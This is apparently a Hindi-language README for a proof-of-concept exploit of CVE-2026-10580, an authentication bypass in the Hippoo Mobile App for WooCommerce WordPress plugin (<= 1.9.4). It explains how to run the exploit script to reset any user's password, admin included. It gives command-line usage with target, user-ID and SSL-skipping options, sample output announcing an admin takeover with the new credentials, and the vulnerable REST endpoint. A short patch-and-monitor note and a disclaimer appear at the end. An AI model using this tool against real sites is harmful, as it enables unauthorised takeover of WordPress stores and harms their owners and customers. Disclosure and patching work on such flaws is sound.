
CVE-2026-10580 के लिए PoC एक्सप्लॉइट - WooCommerce <= 1.9.4 के लिए Hippoo मोबाइल ऐप में प्रमाणीकरण बाईपास जिससे एडमिन खाता अधिग्रहण होता है
यह उपकरण CVE-2026-10580 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट है, जो Hippoo Mobile App for WooCommerce वर्डप्रेस प्लगइन (संस्करण <= 1.9.4) को प्रभावित करने वाली एक प्रमाणीकरण बायपास कमजोरी है। इस कमजोरी के कारण अप्रमाणित हमलावर किसी भी उपयोगकर्ता (एडमिन सहित) का पासवर्ड रीसेट कर सकते हैं, जिससे साइट का पूर्ण अधिग्रहण हो सकता है।
⚠️ महत्वपूर्ण: यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए है। उन प्रणालियों के विरुद्ध अनधिकृत उपयोग जिनके आप स्वामी नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है, अवैध है।
requests लाइब्रेरीनिर्भरताएँ स्थापित करें:
pip install requests
python3 exploit.py -t https://target-site.com -p NewPassword123!
डिफ़ॉल्ट एडमिन आईडी (1) और SSL सत्यापन के साथ शोषण:
python3 exploit.py -t https://example.com -p PwnedCVE2026!!
एक विशिष्ट उपयोगकर्ता आईडी को लक्षित करें और SSL सत्यापन अक्षम करें:
python3 exploit.py -t https://example.com -p NewPass123 -i 2 -k
बैनर के बिना चलाएँ:
python3 exploit.py -t https://example.com -p NewPass123 --no-banner
[+] 3 उपयोगकर्ता मिले
- उपयोगकर्ता आईडी: 1 | उपयोगकर्ता नाम: admin | भूमिका: प्रशासक
- उपयोगकर्ता आईडी: 2 | उपयोगकर्ता नाम: editor_user | भूमिका: संपादक
- उपयोगकर्ता आईडी: 3 | उपयोगकर्ता नाम: subscriber1 | भूमिका: ग्राहक
╔══════════════════════════════════════════════════════════════╗
║ एडमिन अधिग्रहण सफल ║
╚══════════════════════════════════════════════════════════════╝
लक्ष्य: https://example.com
लॉगिन: https://example.com/wp-admin
उपयोगकर्ता नाम: admin
पासवर्ड: PwnedCVE2026!!
यदि आप Hippoo प्लगइन का उपयोग कर रहे हैं, तो इसे तुरंत एक पैच किए गए संस्करण (>1.9.4) में अपडेट करें। इसके अतिरिक्त:
/wp-json/wc-hippoo/v1/ext/wp/v2/users पर अप्रत्याशित API अनुरोधों के लिए लॉग की निगरानी करेंयह प्रोजेक्ट MIT लाइसेंस के अंतर्गत लाइसेंस प्राप्त है। विवरण के लिए LICENSE फ़ाइल देखें।
0xgh057r3c0n
लेखक इस उपकरण के किसी भी दुरुपयोग के लिए जिम्मेदार नहीं है। जिम्मेदारी से उपयोग करें और केवल उन प्रणालियों पर जिनके आप स्वामी हैं या परीक्षण की स्पष्ट अनुमति है।
| तर्क | विवरण |
|---|
-t, --target | लक्ष्य वर्डप्रेस साइट URL (जैसे, https://example.com) |
-p, --password | एडमिन खाते के लिए सेट करने के लिए नया पासवर्ड |
-i, --id | अधिग्रहण के लिए उपयोगकर्ता आईडी (डिफ़ॉल्ट: 1) |
-k, --insecure | SSL प्रमाणपत्र सत्यापन छोड़ें |
--no-banner | ASCII बैनर को दबाएँ |